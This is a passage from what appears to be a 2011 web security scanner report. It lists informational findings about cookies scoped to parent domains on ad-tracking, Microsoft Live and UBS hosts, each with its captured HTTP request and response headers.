MAFuXguXX5ovep53XICX1ePh1J/hMiVmVn71nmrP6iY4HVbwOm1wlIyOusASJ6brothdTFd5V1RaeprZxmXcpjTdeaP03uuXzWLeLkdhRLYrhWsOgewst7J50BYqMI3DJNGA/kVMwOgP0yaCPeYh7UYDLFRChaY9RaYltVG3BqzavV7z/TN/CUQVdMHV051g3HU7TPTnDvgW1JFt4bMTZSTyZK9Vz023ROsCGFNrCvXp4uMMukCPnLhdCrwi9cTJcik5vFX6VsquWwA4YRDjsK+EMNL+H07OWYC40ywa+x34sL20P9kt9lUXQdZrE4w1T0Ai3K4n71u+CEeFcYDGW3RdCtqwhjm9v9fN5RukFo2jKGZBoi3y15nkQZ5lxlAopZV; rsi_segs_1000000=pUPF4jOheXIMH/C1v6FY5BD9CU6du67BSgvgzGDKayViGy3JIntSYSCogy2dpq+vTNY9h2lFiAhEBsltMJbTJ9ivq7PTxfNWHGNAsDuCMaDOsTL2zPjGJ+CmLyT1fIx2UEmQqSaRlxwJf87lS0DSpS34ET1l5eDtMmmNUq38ritDzt0qMIT37KJxcr4I926kXGcBv1f+PlRy1YRo+0j9e1w838xgs4qtMuHJ90XLG6RbwlkrvkToOceVQTaOiUZU/rxSy5Qu6HXjzsXVOVmNAWWASVamxCEkN1L6ihWFC8ws5XARoRY9wzIAMfg9/1loHEfe1+HXBkwmZBbpcxg51RGTU74BDldjx2+dF0Ma8d2aV97JgPzw21QEGFaJMpQxIa8qF7TyvyiIDfGdeKQGuAQ/OTDCJg4o2QVFNzKdUEvgGjAOEysGaiRP3qVv7QVIJoh+/u0LWksU4W2M2y8ypXUrK0K3ItRF/Iczv8l1mcBHEcZNvPgAHmNJ29T7pHeeR8oFKTQNfPyQmLW2aaz3YNVElfNa5z9QG4akMouVMFXDD0rhvkqtZ8sYH5/H7N49fKrdemzWSUrYrcbYHCQv+GTQOTlvJ3I7uggVSAxHoD70bb3St51P9Dxv6oXHekK5/IYIf28uwGtRcld8yrPBrHAg34wtHGRhvpl6dHoJZo/vbbsKtSnDL3Zz19C1wHWlV8uTdIjd90gL5yoZRDt6LeZpFQudSu0zSwA9IvWVADSBfsZ6S0NDSfgYUcFw8jp9Tl70PII=; rtc_SA26=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; udm_0=MLv3NzMJZjpn3hepL5u85DdJSwnsJulKw7GjhUc66G1t5sARqqsaA7LZsKuuAdTsr767GbQcHDkWCrTmeWLtWp6yJz762TB1UwcjeHZXUyd9djFNJcLio30yxF0HHJw8BhRaZV09XADuFryc7t6F+RKBP1VaY7UwWUB6Hqw/8hvNvCj0P2aI5BUiVaG+ymma61YZrZ6cNi/7+BUP0nU3S/7aDey8pNKbTFe5PtnGelVZx+7RzWne/EK0Hqzvg/cAt24xuyuQiRcU+otjq8L91/vhBet19A0gHxTyU8bHnQxFZQGXBELihm7JUcNFWfDqL5oCOH9CkkBF/VWGyJdwtLmAAMBzOVpAH5rEQxhhn0ldtQhNKu95VbXaqi9Hy7HcpaYFFAG0gZBby/Ino2ND/TX6tyQ5BZVEmjC+vrBUCdi5gDjg8vCrIq6mOhXIxsr1rgP8VqKRS2482lJZLRiYVHVavyAnmm0xR9AiAdeo7Ulq59C1wDZnxwfvLEeBAQQvJD4UAZPMnAWC71qNBnXlSwn6B+iu+W0enrMzUh+pt/42W3ZyHY6wPL0wN55ZpdBoj2pz9x8DZxFJC8/0xAJN9asAv63LYh4pP2tKYCBkV7sKBfAVfyGLdNX/pP4+LEd7PMBqXJitqkzbF9+MLaphweZ3TkcNlE7FaGnjxQPdRypua7cLagU/pdcDVheJzU1Qpv5fnqo9hEcP5pXLebWRI35fOi6VMBuXnQHASM+ZvmIW7roY6dkcDDEPcSnE/eVzUk1c/p+XX0Gk0keWgb40WTFsa/iaQB6LydhfqaYhZGfvb7xoznGXYdL5IifgNcFokjWzep4hkl8kRRTKjBctzuSV0dfTjVJqWlkVn7ojPnTBtr7nvJyfyXssvc/oZPEKn6xtEkyP+huheQDpHwPE81CoOtg/xxDXS0cNluwSTrrZ/tcX/xM4VOQR6XJV7wiNgHj3COP52BgkFWuYCBWpp1Ij5FPQMSbt7pTH2c7UBstZHYsg3GEOgYj0QEAQUa+Gg3z/6YHY+hyOzKt+cCLpId3IuTquVU751kovG4jfZSDMngJEtub6vIo6aw9Ns/MIKRJThup9RJD3VB7EqUTygRfVC30WTM3yC/zCJcQvarkTIoqam+R1D4GnO60sxQIS+e/mX1w/KtPS81kyXN6TiaVQ7uglYyqBXtk/zz0qF6qzFm//Nv417kCWRG0/vOhqEU/d8q3yrAyqHEYTSMmgweeGAIN90FXwo5jDGblHJSyXqxHWV9tUDHtz1PxpJxB1N8GXbFB5TYAQUhQ7vJg7adz9jm8rfw8Y7beMhj+wZIuYSnRxUzpmUnS6ofeg1QUuC+Z3qf9S7L5SQNszvtcoLBc9Ah719T7f1ysEtywa9Vsd4Wwjl8zKCUqlK6pTR5hWwZKA/2vTlMW5KP8nlUJA0ghGLgKo0mw7K7ldIJDGgt35+98A8BFGuHkaYpjyQv6K3yw7I7DTxyaHys5L8nH5kQAKN3bYKYwjlWBp2N1SgUMI3nI+Cog1m4pF8d9z9xmgld2nyHHdFPNPN6cMyv5q95UqaeXKbbMoW1DWCZyaRTxpTpUv59jUkNuIfK24AUjxGeDuhOr8H5iJ6Jed0O3F4r/0YCsGYGJOx3YXtvXWHgws0N2UBQmJKmxDEOOnMYBplTFEsCuxSiua6b4/y40n8k3S4Svj/LU8Vywx/GY+KvqWkJzzM2QF2z2NaZngQD+ZUuVILb/zzsLyvu+vzkGfYcxC8/Dtr0TTpC57iD72sgltU1Tbp82Kl9OoNo7MKHvxORyvpLnM+wk+V9gxpSUMn3U+jtQ+

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_v0Na=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SA26=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Vpu9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iydh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4k9BuXIMH/AtZKgq+tBdHBVM7RYjwSPPC3FVLQFwFuMWG8EbAQsYoI8OaV7WOPjhx2CPcf9OpsZ48ffhgxUKwuHNdaG23oxgOxz4a2BAp5KnJ3kxYWukGTD9NHDu8HXg48nFrD79wjk7auuMDaF0MDEpTr5tMmmNUq38rgsEW4ayA8sCri2difrlqs/ene9+0qYeAfsmIqFs+0h9eFw838xg8/lCR7F0cH8rBUq6YU/9uihuCUcdFDV0an6kUaJ3sBvD3Tkfvy3EISMZa1zqUadhdbND+xUJZWqZWdDr+HWh2QBujcRipZlNYvBhOgEDd3F3DGEKvxZpcwjaLytiu147VLpmewyyiidQoXqce5lKaJk9S7G0XA2JVhoBTiP98/BwqSgIAxs3Z0Zi8eNprpTgeQ+w6Kn7LwNms9soA9Dpsu9og1qQJHB4aseZew+aew5y/ZNYSeIi9cIoxIcsNpQztLdBXXmvC925sWanqfyt8IXbY+LsTOEuFvoxYXAOrMbmM0uFHlGV5PS3E2KKr3EzPWWlX7+RPpv7E7R7U/TEbe0NpiODIG/uPEhR8i9pAEQMKLzhnNI654bV3jfWPCG43Y3UD9Zx10dgLTz3jCnBdPlX/DnObvK3St53/AcO5JCK4ne1hUKbVROkiYw1rfHnvjCM1/MNSlt0upkZwyZlOTkZ69diDWW+QyGqCV3/WgLueQXvOx1RQft/4PPBhoKMH0stGdjEWSwWevbrP9hM2WQ1vCvztSZZTB6+LNnXp3BZhTHV; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
Set-Cookie: rtc_N0S3=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 173
Date: Wed, 06 Jul 2011 14:01:44 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['K08784_10001'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K08784_10001'],'k08784');}

9.30. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU; expires=Tue, 04-Oct-2011 14:00:51 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1794506331;fpan=0;fpa=P0-399196261-1309960828609;ns=0;url=http%3A%2F%2Ftechflash.com%2Fabout.html;ref=http%3A%2F%2Ftechflash.com%2F;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1309960851219;tzo=300;a=p-b1m9DYkJHhIgg HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EE0ACvaeApllAacBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0dpKRrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/7111//82F1/
Set-Cookie: d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU; expires=Tue, 04-Oct-2011 14:00:51 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Wed, 06 Jul 2011 14:00:51 GMT
Server: QS

9.31. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-5eu58oSpL1cEs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EO8AFPaeApll_6ixz4EBrAEBlAeB1Q4eqT0eThocKRkoxJavgQCIEACWCmAObyviDOFdHhDRDhDRmS5bkrFrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q; expires=Tue, 04-Oct-2011 15:39:02 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-5eu58oSpL1cEs.gif?labels=_fp.channel.Beauty+of+the+Web,_fp.event.All+Content HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EO8AFPaeApll_6ixz4EBrAEBlAeB1Q4eqT0eThocKRkoxJavgQCIEACWCmAObyviDOFdHhDRDhDRmS5bkrFrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q; expires=Tue, 04-Oct-2011 15:39:02 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Wed, 06 Jul 2011 15:39:02 GMT
Server: QS

GIF89a.......,.................D..;

9.32. http://profile.live.com/badge/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/badge/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

E=P:bOIwReUJzog=:+1yDfpFa5Q6cY2Ra7+2GtI6CZeM5y7anIF6uyN3OFUc=:F; domain=.live.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badge/?url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx&title=Microsoft+News+Center&description=&screenshot=https%3a%2f%2fwww.microsoft.com%2fpresspass%2f_resources%2fimages%2fimg_simpleShareThumb_blue134.png HTTP/1.1
Host: profile.live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; sc_clustbl_142=6725091ecd4325b02:nK2egy9F4YAy3X0iJIsk4gWz/TnLERdzTYsLBI8gS4dY1I1zZH7VdzxoWPietMFwJ+QtJqQopIgEEkfF8AtEkdCRD5CVTskP/DRQUugWImwwVCCEmH0dJyGBA/G61wU3f520yqTm46/CX4/Eyo6aSA==; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950981&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1
Server: Microsoft-IIS/7.5
X-Imf: 8b22b2cd-4263-44ba-aaeb-e42b091bf16a
Set-Cookie: E=P:bOIwReUJzog=:+1yDfpFa5Q6cY2Ra7+2GtI6CZeM5y7anIF6uyN3OFUc=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 09:36:21 GMT; path=/
Set-Cookie: SABadge=msg=&url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx&title=Microsoft%20News%20Center&description=&screenshot=https%3a%2f%2fwww.microsoft.com%2fpresspass%2f_resources%2fimages%2fimg_simpleShareThumb_blue134.png&ctype=link&swfurl=&height=&width=&emv=; expires=Thu, 07-Jul-2011 11:16:21 GMT; path=/Badge/
Set-Cookie: sc_clustbl_142=d751af858b13d51f; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:21 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC667 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 11:16:21 GMT
Content-Length: 314

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950981&rver=6.1.6206.0&wp=MBI&wrep
...[SNIP]...

9.33. https://quotes-public.ubs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public.ubs.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NavLB_PQ=quotes-public1.ubs.com; Domain=.ubs.com; Path=/; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.34. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/wb/home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:06:32 GMT; Path=/; Secure; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/home HTTP/1.1
Host: quotes-public1.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
